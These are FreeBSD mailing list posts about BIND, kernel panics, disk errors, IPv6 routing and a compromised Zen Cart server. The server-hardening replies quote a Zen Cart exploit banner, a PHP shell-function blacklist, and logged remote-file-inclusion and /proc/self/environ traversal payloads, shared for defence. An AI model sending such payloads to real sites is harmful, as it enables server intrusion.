Re: BIND Refusing to Resolve for External Hosts
uhm here's my named.conf (it's a bit lightwight) but it works... // $FreeBSD: src/etc/namedb/named.conf,v 1.26.2.2.4.1 2009/04/15 03:14:26 kensmith Exp $ options { directory/etc/namedb/namedwritable; //made dir writable to bind user pid-file/var/run/named/pid; dump-file/var/dump/named_dump.db; statistics-file/var/stats/named.stats; //listen-on{ 127.0.0.1; }; disable-empty-zone 255.255.255.255.IN-ADDR.ARPA; disable-empty-zone 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA; disable-empty-zone 1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.IP6.ARPA; forwarders {8.8.8.8; 8.8.4.4; 62.231.76.49; 81.18.85.7; 4.2.2.4; 208.67.222.222; 208.67.220.220; 213.154.124.1; 193.231.252.1; 4.2.2.1; 4.2.2.2; 4.2.2.3; 4.2.2.5; 4.2.2.6; 151.197.0.38; 151.197.0.39; 151.202.0.84; 151.202.0.85; 151.202.0.85; 151.203.0.84; 151.203.0.85; 199.45.32.37; 199.45.32.38; 199.45.32.40; 199.45.32.43; 192.76.85.133; 206.124.64.1; 67.138.54.100; 220.233.167.31; 199.166.31.3; 66.93.87.2; 216.231.41.2; 216.254.95.2; 64.81.45.2; 64.81.111.2; 64.81.127.2; 64.81.79.2; 64.81.159.2; 66.92.64.2; 66.92.224.2; 66.92.159.2; 64.81.79.2; 64.81.159.2; 64.81.127.2; 64.81.45.2; 216.27.175.2; 66.92.159.2; 66.93.87.2; 199.2.252.10; 204.97.212.10; 204.117.214.10; 64.102.255.44; 128.107.241.185; 156.154.70.1; 156.154.71.1;}; }; zone . { type hint; file ../named.root; }; zone pgn.ro { type master; file ../master/pgn.ro.zone; //master dir writable to bind user allow-transfer { localhost; }; allow-update { key rndc-key; }; }; zone pvp.ro { type master; file ../master/pvp.ro.zone; allow-transfer { localhost; }; allow-update { key rndc-key; }; }; zone pnl-mioveni.ro { type master; file ../master/pnl-mioveni.ro.zone; allow-transfer { localhost; }; allow-update { key rndc-key; }; }; zone chiritamarian.ro { type master; file ../master/chiritamarian.ro.zone; allow-transfer { localhost; }; allow-update { key rndc-key; }; }; key rndc-key { algorithm hmac-md5; secret XX; }; ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
FreeBSD 8.0 linux emulator kernel panic
I'm having issues with the Fedora Core6 linux emulator on FreeBSD 8.0 it panics when i run HLDS, the same issue was addressed by Daniel Ballenger in http://lists.freebsd.org/pipermail/freebsd-stable/2010-February/054646.htmlbut i did not get the fix. Giovanni Trematerra gave a response that it was fix in a r200768 now it is clear that i do not know that that code means (in my eyes it's a bsd build or smth) but i'm currently running the latest 8.0-RELEASE-p3 available. Please advise on how to patch the kernel panic. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Issues reinstalling Bind9 on FreeBSD 8.0
Ok i'll make it short coz it's the 2nd time i write this -.-' and don't even ask why :D So here it goes: Fresh FreeBSD 8.0 install, installed bind97 to witch i have busted up the named.conf fine and tought, at the time, that deleting the whole content of /etc/namedb and reinstalling the bind port will simply write the files up again. Well it's not like that... i;ve did pgk_delete, make deinstall, make rmconfig, tryed to manually delete all the files required but no joy. Now i've tryed to use all bind9 bind96 and bind97 from ports and even get the source from isc.org but they all did the same, even more after a reboot and again the same process (source+ports) the builds didn't even install the named binary /etc/rc.d/named: WARNING: run_rc_command: cannot run /usr/sbin/named Please do tell me how to purge completly a port, delete all it's files and configs then install it again from scratch... I'm using a 64bit FreeBSD 8.0 on AMD Athlon X2. Best regards, Bogdan. ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
sata hdd issues, timeouts'n'failures
Hi .. i'll be straight to the point, yesterday morning i've experienced some issues with my FreeBSD 7.2 p7 regarding HDD partition error messages. It all started a week ago when out of the bloom a few phpBB3 database tables got corupted and upon reading the messages in /var/log i've saw: May 3 09:34:36 pgn kernel: ad10: WARNING - WRITE_DMA UDMA ICRC error (retrying request) LBA=143694719 May 3 09:34:40 pgn kernel: ad10: TIMEOUT - WRITE_DMA retrying (1 retry left) LBA=234746399 May 3 09:35:20 pgn kernel: ad10: WARNING - WRITE_DMA UDMA ICRC error (retrying request) LBA=17996279 May 3 09:35:27 pgn kernel: ad10: TIMEOUT - WRITE_DMA retrying (1 retry left) LBA=140791775 May 3 09:35:32 pgn kernel: ad10: TIMEOUT - WRITE_DMA retrying (1 retry left) LBA=14029855 a whole bunch of those about 1 minute apart. May 3 09:47:09 pgn kernel: swap_pager: indefinite wait buffer: bufobj: 0, blkno: 5, size: 32768 [] May 3 09:48:46 pgn kernel: ad10: FAILURE - WRITE_DMA timed out LBA=14741375 May 3 09:48:46 pgn kernel: May 3 09:48:46 pgn kernel: g_vfs_done():ad10s1d[WRITE(offset=2715713536, length=16384)]error = 5 [.] until the sistem became very slow and hard to use i've rebooted a few times, tryed to boot into single user mode and fun fsck but the issues still occur.. Now the GEOM_LABEL renames the ufsids timeouts still occur, and today ended up with May 4 15:26:24 pgn kernel: fsync: giving up on dirty May 4 15:26:24 pgn kernel: 0xff000395a7e0: tag devfs, type VCHR May 4 15:26:24 pgn kernel: usecount 1, writecount 0, refcount 934 mountedhere 0xff0003879c00 May 4 15:26:24 pgn kernel: flags () May 4 15:26:24 pgn kernel: v_object 0xff0003923e58 ref 0 pages 3725 May 4 15:26:24 pgn kernel: lock type devfs: EXCL (count 1) by thread 0xff00117e6370 (pid 1181) May 4 15:26:24 pgn kernel: dev ad10s1f May 4 15:26:40 pgn fsck: /dev/ad10s1f: CANNOT CREATE SNAPSHOT /usr/.snap/fsck_snapshot: Resource temporarily unavailable May 4 15:26:40 pgn fsck: May 4 15:26:40 pgn fsck: /dev/ad10s1f: UNEXPECTED INCONSISTENCY; RUN fsck MANUALLY. please advise it's pretty serious, i googled around but sincerly it's such a big issue that it can't wait :( thanks! p.s. whole /var/log/messages: http://pastebin.com/KcF3ziYu sistem info (df -h, uname, fstab, etc.): http://pastebin.com/dK8UKfhT ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: sata hdd issues, timeouts'n'failures
replacing the disk is easy, i'm still curious why this has happend and if it's indeed a hardware issue... now i've tryed to install sysutils/smartmontools and the box simply crashed 2 times (one recovery and last one dead'n'burried) it cracked when it got to === Checking if sysutils/smartmontools already installed Making install in . test -z /usr/local/sbin || ./install-sh -c -d /usr/local/sbin install -s -o root -g wheel -m 555 smartd smartctl '/usr/local/sbin' test -z /usr/local/etc || ./install-sh -c -d /usr/local/etc install -o root -g wheel -m 444 smartd.conf.sample '/usr/local/etc' the ping got to 1300ms then the box freezed... ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Info on DOS mitigation, kernel configuration for DOS mitigation
Hello everyone! First of all i would like to apologize to anyone who finds my appeal a lazy man's choice, actually it's indeed lazy but it's the best way to get an answer from a valid source. My problem is a potential DOS/DDOS... i know a forever talked about issue... i've already searched the freebsd's mailing lists and found some mitigation techniques, to bad that google ain't that familiar with FreeBSD, and searchin' for guides is a pain... I recall finding a mitigation technique that involved bandwidth shaping and other ... I'm using a FreeBSD 7.2-p7 with ipfw and upon testing the rules in those guides it alerted me that bandwidth modules weren't included in the bsd's kernel... Anyway could anyone provide me with a good BSD walk trough for DOS mitigation and if needed kernel modules and kernel module integration, mabe other firewall (but with extended howto..) ... (basically anything regarded to floods) Thanks in advance! ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: HELP! Is that possible creating a user named root but acturallynot the administrator root
Edit the /etc/master.passwd and /etc/passwd records to change the uid and gid of the root account BUT FIRST MAKE SURE YOU ADD (or changed password of) ANOTHER UID0 ACCOUNT here's an example: etc/master.passwd: root:*PASSWORD HASH*:99:99::0:0:Charlie :/root:/bin/csh and /etc/passwd root:*:99:99:Charlie :/root:/bin/csh check the toor account it's already created by freebsd but it doesn't have a password, 1st apply a password for that account, triple check that it's usable then edit the records (keep in mind that the 99 uid and 99gid in my examples are fake try giving your's the uid and gid of the nobody account, or someother) cheers! 2010/2/11 Anthony M. Rasat anthony.ra...@gmail.com Lin Taosheng wrote: Is that possible to implementated? No. I think not. But I have not tried it either. Can I ask what do you want to achieve? Because I had the same thought once, concerning how to combat once-increasing script-driven SSH brute-force attack. But I was instead have a better solution using fail2ban to easily thwart those SSH brute force attack. Is that your situation? Regards, Anthony M. Rasat Manager - Technical, Network and Support Division PT. Jawa Pos National Network Graha Pena Jawa Pos Group Building, 5th floor Jln. Raya Kebayoran Lama 12, Jakarta Selatan 12210 Indonesia.- Phone 02132185562 Phone 081574217035 Fax 02153651465 Web http://www.jpnn.com ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
try php's safe_mode but it is likely to keep the hackers off, indeed they can get in and snatch some data but they would be kept out of a shell's reach... but sometimes safe_mode is not enough... try considering Suhosin but the addon not the patch... and define the suhosin.executor.func.blacklist witch will deny use of certain php commands that allow shell execution... but keep in mind it's impossible to prevent all breaches... this php patch will only keep the hacker kiddos off but there's still a good chance it can be broken... stay safe ! ref's: http://www.hardened-php.net/suhosin.127.html http://beta.pgn.ro/phps/phpinfo.php 2010/1/31 James Smallacombe u...@3.am Whoever speculated that my server may have been compromised was on to something (see bottom). The good news is, it does appear to be contained to the www unpriveleged user (with no shell). The bad news is, they can still cause a lot of trouble. I found the compromised customer site and chmod 0 their cart (had php binaries called core(some number).php that gave the hacker a nice browser screen to cause all kinds of trouble) Not sure if this is related to the UDP floods, but if not, it's a heck of a coincidence. At times, CPU went through the roof for the www user, mostly running some sort of perl scripts (nothing in the suexec-log). I would kill apache, but couldn't restart it as it would show port 80 in use. I would have to manually kill processes like these: www 70471 1.4 0.1 6056 3824 ?? R 4:21PM 0:44.75 [eth0] (perl) www 70470 1.2 0.1 6060 3828 ?? R 4:21PM 0:44.50 [bash] (perl) www 64779 1.0 0.1 6056 3820 ?? R 4:07PM 2:24.34 /sbin/klogd -c 1 -x -x (perl) www 70472 1.0 0.1 6060 3828 ?? R 4:21PM 0:44.84 I could not find ANY file named klogd on the system, let alone in /sbin. Clues as to how to dig myself out of this are appreciated I found this in /tmp/bx1.txt: --More--(5%)#!/usr/bin/php ?php # # --- Zen Cart 1.3.8 Remote Code Execution # http://www.zen-cart.com/ # Zen Cart Ecommerce - putting the dream of server rooting within reach of anyone! # A new version (1.3.8a) is avaible on http://www.zen-cart.com/ # # BlackH :) # error_reporting(E_ALL ^ E_NOTICE); if($argc 2) { echo =___ Zen Cart 1.3.8 Remote Code Execution Exploit = | BlackH bl4c...@gmail.com | | | | \$system php $argv[0] url| | Notes: url ex: http://victim.com/site (no slash) | | | ;exit(1); --- snipped -- It is dated from two nights ago, after these issues started, but it's nonetheless larming. Security Focus is aware of the issue and refers you to Zen for the fix. Only problem is, this is an old version of Zen cart, and the James Smallacombe PlantageNet, Inc. CEO and Janitor u...@3.am http://3.am = ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: Server compromised Zen-Cart record company Exploit
Indeed it's pretty tricky with safe_mode, like for certain i know that a version of a popular r57 shell had safe_mode bypass - i was stunned to check the shell myself on my server... and i was thinking that safe_mode is enough... (+ i was using the suhoshin patch *witch in fact does nothing regarding straightening the php) then i came over suhoshin the addon (witch on my BSD with lighttpd it could be loaded only using Zen framework... for unknown reasons to me) the suhoshin was configured to blacklist some basic commands that allow php to directly run shell commands: suhosin.executor.func.blacklist = proc_nice,shell_exec,show_source,symlink,system,dl,highlight_file,ini_alter,ini_restore,openlog,passthru,exec thus even if hackers find bugs in some php apps it would be harder to get a shell... i say harder because it's impossible to prevent that - there are mysql ways to get shell and so on ... so it's not 100% foolproof, but it's here's some examples on how suhoshin alerts the attacks: Jan 2 02:17:00 pgn suhosin[75216]: ALERT - tried to register forbidden variable '_SERVER[DOCUMENT_ROOT]' through GET variables (attacker '91.121.75.82', file '/usr/home//pgnlinks/index.php') Dec 16 23:43:36 pgn suhosin[87560]: ALERT - function within blacklist called: shell_exec() (attacker '86.122.161.162', file '/usr/home//pvpwww/junkforum/Sources/Subs.php', line 3531) *note - these are logs from /var/log/messages and the last message is a false-positive (i thinks it's called that way) it's a basic function of SMF board to check the DNS with a linux command, but i just wanted to point out how it handles the blacklist... here's a more detailed info regarding attacks (attempts) stored in the webserver's log file (in my case lighttpd): 2010-01-19 02:21:53: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'list' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php') 2010-01-19 02:21:54: (mod_fastcgi.c.2698) FastCGI-stderr: ALERT - ASCII-NUL chars not allowed within request variables - dropped variable 'c' (attacker '189.26.208.35', file '/usr/home//pgnlinks/index.php') 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?list=http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 302 0 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:20:43 +0200] GET /index.php?c= http://www.startasurvey.com/cmd/cmd.txt? HTTP/1.1 200 3304 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:53 +0200] GET /index.php?list=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3307 - Mozilla/3.0 (compatible; Indy Library) 189.26.208.35 www.pgn.ro - [19/Jan/2010:02:21:54 +0200] GET /index.php?c=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1 200 3306 - Mozilla/3.0 (compatible; Indy Library) My server has safe_mode off - bcoz it's not needed (at least in my mind... i might be mistaking) and check out the phpinfo.php file i've got and see the suhoshin settings stay safe! ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
FreeBSD ipv6 rc.conf settings issue
I'm having problems with the /etc/rc.conf setup of a ipv6 tunnel on my FreeBSD 7.2-RELEASE-p6 It`s a particular issue on the ipv6_defaultrouter config, it jost does not work... Upon network and routing restart ipv6 is enabled the gif interface are given ip's and everything but the defaultrouter does not. Researching a bit i found some say that gif1 sould work and tried both ipv6_defaultrouter=-interface gif1 and ipv6_defaultrouter=2001:0470:1f0a:d40::1 but no joy... here is the basic comand line config from tunnelbroker.net http://pastebin.ca/1736599 here's the rc.conf defaultrouter=86.122.121.129 gateway_enable=YES hostname=pgn.ro ifconfig_nfe0=inet . [...] ipv6_enable=YES ipv6_network_interfaces=lo0 gif1 ipv6_gateway_enable=YES gif_interfaces=gif1 gifconfig_gif1=86.122.121.171 216.66.80.30 ipv6_ifconfig_gif1=2001:0470:1f0a:d40::2/64 ipv6_defaultrouter=-interface gif1 [...] after that i do a quick network restart http://pastebin.ca/1736601 as ipv6 does not work i use route to add the gateaway : http://pastebin.ca/1736604 ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
Re: FreeBSD ipv6 rc.conf settings issue
Some point out rc.local as a fix, i find it ok to but it has some ups'n'downs indeed in a reboot situation rc.local having the route add command would be ok but in a short network restart it wouldn't count (as i particularly value my uptime)... the ipv6 defaultroute it's not a big issue for me, as i do not depend on it so much, but i find it somewhat important to FreeBSD ... dunno i like to know that a distro is stable in any case (not that i'm complaining FreeBSD) reference: http://www.tunnelbroker.net/forums/index.php?topic=734.0 2010/1/7 Steve Bertrand st...@ibctech.ca Bogdan Webb wrote: I'm having problems with the /etc/rc.conf setup of a ipv6 tunnel on my FreeBSD 7.2-RELEASE-p6 It`s a particular issue on the ipv6_defaultrouter config, it jost does not work... Upon network and routing restart ipv6 is enabled the gif interface are given ip's and everything but the defaultrouter does not. Researching a bit i found some say that gif1 sould work and tried both ipv6_defaultrouter=-interface gif1 and ipv6_defaultrouter=2001:0470:1f0a:d40::1 This issue is not limited to gif interfaces... I've had this exact same problem on ALL of my FreeBSD hosts for, well, since ever. No matter what I've tried, if a box reboots, I must manually enter in the default IPv6 router. Even on IPv6-only hosts, the default gateway does not take upon reboot. I'm up for figuring this issue out today, if nobody else has a solution for you. Let me know. If you're interested, I'll fire up a couple of hosts that we can use and just continuously reboot if necessary :) Steve ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org
FreeBSD 7.2 savecore panic
Hello. I've got a small issue with my bsd box... I'm a new BSD user and please accept my deepest apologies if i have rushed to use the mailing lists to shout, what may be a silly issue. During the 3 moths the server that i manage had 2 unexpected reboots after some ports were about to be installed. The first time i wasn't paying much attention to the process and can't tell exactly what caused the panic (it was certainly a port install related) but i've paid close attention to this 2nd time. The server runs FreeBSD 7.2-RELEASE #0 on a amd64 arch and it cracked when i tried to install portmanager from the /usr/ports/ports-mgmt/portmanager tree and using the basic 'make install clean' command. Previously i've made the steps of updating the portsnap collection in order to keep my box up2date. Out of nowhere bsd crashed and using google i've managed to get some info about crash logs: ./messages:Oct 20 00:13:25 pgn savecore: reboot after panic: page fault /var/crash/info.0 Dump header from device /dev/ad10s1b Architecture: amd64 Architecture Version: 2 Dump Length: 426561536B (406 MB) Blocksize: 512 Dumptime: Thu Sep 10 18:36:20 2009 Hostname: pvp.ro Magic: FreeBSD Kernel Dump Version String: FreeBSD 7.2-RELEASE #0: Fri May 1 07:18:07 UTC 2009 r...@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC Panic String: page fault Dump Parity: 2499253002 Bounds: 0 Dump Status: good pgn# uname -a FreeBSD pgn.ro 7.2-RELEASE FreeBSD 7.2-RELEASE #0: Fri May 1 07:18:07 UTC 2009 r...@driscoll.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64 saw some other topic related to issues like this and they pointed out tinkering the rc.conf:dumpdev=AUTO rc.conf:savecore_flags= But if i would prolly knew what i'm to do i wouldn't write this long dumb help request :) What's wrong with my bsd box (witch i'm in love so much now) and how can i prevent it from panicking ___ freebsd-questions@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-questions To unsubscribe, send any mail to freebsd-questions-unsubscr...@freebsd.org